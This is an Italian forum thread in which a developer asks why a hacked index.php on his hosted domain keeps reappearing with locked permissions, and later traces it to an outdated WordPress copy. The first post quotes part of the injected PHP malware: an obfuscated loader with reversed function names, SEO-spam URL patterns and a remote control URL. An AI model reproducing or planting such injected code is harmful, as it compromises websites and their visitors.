[Dominio] File con permessi 444 e codice malevolo

Discussione in 'Domini' iniziata da felino, 29 Marzo 2019.

  1. felino

    felino Utente Attivo

    Registrato:
    12 Dicembre 2013
    Messaggi:
    844
    Mi Piace Ricevuti:
    8
    Punteggio:
    18
    Occupazione:
    Developer Senior
    Località:
    Aci Catena (Catania)
    Buongiorno a tutti,
    ho un dominio su Aruba, nel ho pubblicato:
    - un ecommerce nella directory /shop
    - un file index.php nella root che al momento fa un redirect alla cartella /shop

    Da un mesetto circa il file index.php e' stato modificato (non da me) con del codice malevole con tutte le conseguenze del caso.

    Il problema e' che tale file ha i permessi settati a 444, provo a modificarli e ottengo un messaggio di errore.
    Ho richiesto supporto ad Aruba.it per la cancellazione, una volta cancellato viene generato nuovamente.
    Stesso identico problema ce l'ho con il file .htaccess

    Qualche suggerimento?

    Qui una parte del contenuto:
    PHP:
    <?php @'$
    yumingid=47
    lineid=2332
    x3=index.php/
    x4=ghpyxlOwbV
    x5=underlying,roadside,alone,ethics,smaller,hotpants,agree,jasper,horse,Baby,stick,despair,SharkFin,bulk,Apprentice,whole,plow,coconutmilk,trunklineelectrification,inspire,impossible,pantyhose,earthquake,sage,BarberShop,carrier,evidence,English,Latin,definite
    x6=
    x7=http://jnice01.ouuwtizhy573nskt/weilai0.php
    cache=0000
    sps=111111000
    urlgz=[0:3]^[0:8]-[0:6~12][1:6]/[0:8~10]!/|[0:7~10]^/[1:8]/!/[0:10~15]/|[0:8~10]^-[2:10~12]-[2:4]-[2:6]-!/|^-[2:8~12]-[2:5~10]-[0:5][1:8]/![0:3]/|^[0:10~12]/[0:1]_[2:8~12]-!/|[0:10~12]^/[0:6~12]_[1:6]-!/|[0:10~15]_[0:6~10]-^-![0:2]/|[0:10~12]-[0:1]^-[0:4]-[0:1]!-[0:10~12]/|[0:1]^-[0:3]-[0:10~12]-[0:5]-[0:5]!/|^/[0:10~12]_[1:3~5][0:4]-[0:8]-!/|^[0:5]_[1:5]_[2:12~15]_!|[0:3~5]-^-[1:10~12]-[0:10~12]/![0:2]|^[0:6~8]/[1:8~12]-!/[0:5~8]|^_[1:6~8]_[1:6~8]/[2:8~12]_[0:5~8]/!|[0:12]_^-[2:10~15]_[0:6~8]_!|[0:10~15]/^-[1:6~8]/!|^[3:6~10]/[0:1]_[2:12]_!|[0:8]/[0:6~8]/^-!/[0:8~10].php|^/[2:10~12]/[1:8~10]-!-[0:3].jp|^_[1:6~8]/[1:6~8]_[0:10~12][1:5]/!.jp|[0:3]^[0:3]-[2:8]-[1:5][0:3]-[2:6]-[0:6][1:4]/[0:2]!.html|[0:8~10]/^-!/[0:15~18].html|[0:6~8]/[0:15~18]/^-!.html
    '
    ;$bbb6b6b66=explode("1l","tilps_gerp1ledocnelru1lemaner1lyarra_ni1lezilairesnu1lstegf1l5dm1lcexe_lruc1lofniphp1lstnetnoc_teg_elif1lrtsbus1ldomhc1llla_hctam_gerp1ldnar_tm1lrewolotrts1lnelrts1lrhc1letad1lemit1lemitmelif1lliec1lgnol2pi1lnepof1ltroba_resu_erongi1lsehsalscdda1ldnar_yarra1llru_esrap1lenifed1ledocedlru1lemanybtsohteg1lelffuhs1lfoef1lrtrts1ltini_lruc1ltfihsnu_yarra1lftnirps1ledolpmi1lciremun_si1lhcuot1letirwf1lyarra_si1lemitotrts1ltimil_emit_tes1lredaeh1legrem_yarra1leuqinu_yarra1ltrats_bo1ltnuoc1lelif_si1lstsixe_noitcnuf1lstsixe_elif1lhctam_gerp1lecalper_gerp1leikooctes1lsoprts1lmirt1lsopirts1lrddaybtsohteg1ltcartxe1legnar1lesolcf1ldro1ledolpxe1lpop_yarra1lsoprrts1lesolc_lruc1ltpotes_lruc1lecalper_rts");foreach($bbb6b6b66 as$b6bbbbbbb=>$bbbb6b6)
    .....
     
    Ultima modifica di un moderatore: 7 Aprile 2019
  2. Utixo Cloud Services

    Utixo Cloud Services Nuovo Utente

    Registrato:
    26 Marzo 2019
    Messaggi:
    8
    Mi Piace Ricevuti:
    0
    Punteggio:
    1
    Occupazione:
    ISP
    Località:
    Milano
    Home Page:
    semplice, pulisci il codice a mano perche non ce altra possibilita e poi devi capire come riescono ad accedere al filesystem, di solito dai log si puo capire facilemente. Oppure ripristina un backup precedente alla modifica dei files.
     
  3. Max 1

    Max 1 Super Moderatore Membro dello Staff SUPER MOD MOD

    Registrato:
    29 Febbraio 2012
    Messaggi:
    3.610
    Mi Piace Ricevuti:
    268
    Punteggio:
    83
    Sesso:
    Maschio
    @felino
    Quando posti del codice PHP devi usare il tag [ PHP] non il tag [ CODE]
    Grazie
     
  4. felino

    felino Utente Attivo

    Registrato:
    12 Dicembre 2013
    Messaggi:
    844
    Mi Piace Ricevuti:
    8
    Punteggio:
    18
    Occupazione:
    Developer Senior
    Località:
    Aci Catena (Catania)
    Ho trovato il problema, nel server era presente una versione di backup e non aggiornata di Wordpress....quella ha generato il problema!

    Hai ragione, scusami!
     
Sto caricando...

Condividi questa Pagina